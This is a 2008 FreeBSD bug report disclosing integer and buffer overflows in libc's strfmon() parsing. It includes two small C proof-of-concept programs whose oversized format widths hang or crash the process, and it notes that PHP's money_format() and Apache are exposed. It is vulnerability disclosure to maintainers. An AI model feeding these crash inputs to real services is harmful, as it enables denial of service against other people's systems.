i386/121818: Buffer Overflow, Integer Overflow
Maksymilian Arciemowicz
cxib at securityreason.com
Tue Mar 18 04:10:03 UTC 2008
>Number: 121818
>Category: i386
>Synopsis: Buffer Overflow, Integer Overflow
>Confidential: no
>Severity: critical
>Priority: high
>Responsible: freebsd-i386
>State: open
>Quarter:
>Keywords:
>Date-Required:
>Class: sw-bug
>Submitter-Id: current-users
>Arrival-Date: Tue Mar 18 04:10:03 UTC 2008
>Closed-Date:
>Last-Modified:
>Originator: Maksymilian Arciemowicz
>Release: FreeBSD cxib.laptop 7.0-RELEASE FreeBSD 7.0-RELEASE
>Organization:
SecurityReason.com
>Environment:
FreeBSD cxib.laptop 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008 root at logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
>Description:
The main problem exists in /usr/src/lib/libc/stdlib/strfmon.c function
Function GET_NUMBER() return wrong integer
#define GET_NUMBER(VAR) do { \
VAR = 0; \
while (isdigit((unsigned char)*fmt)) { \
VAR *= 10; \
VAR += *fmt - '0'; \
fmt++; \
} \
} while (0)
So for example exploit:
---Integer Overflow---
#include <stdio.h>
#include <monetary.h>
main(){
char buff[50];
char *bux=buff;
int res;
res=strfmon(bux, 50, "%#99999999999999999999n", "-999.999");
}
---Integer Overflow---
This program will execute, long time. It is very dangerous, because a lot of programs (like PHP), use this function. It is possible to kill apache childs
Next example:
---Buffer Overflow---
#include <stdio.h>
#include <monetary.h>
main(){
char buff[50];
char *bux=buff;
int res;
res=strfmon(bux, 50, "%99999999999999999999n", "-999.999");
}
---Buffer Overflow---
Program received signal SIGSEGV, Segmentation fault.
0x2814e0e6 in memmove () from /lib/libc.so.7
We are waiting for fast answer, because in PHP 5.2.5 we use money_format() function with strfmon() function.
Best Regards
Maksymilian Arciemowicz
SecurityReason
>How-To-Repeat:
Checks integers
>Fix:
we are waiting to answer.
>Release-Note:
>Audit-Trail:
>Unformatted:
More information about the freebsd-i386
mailing list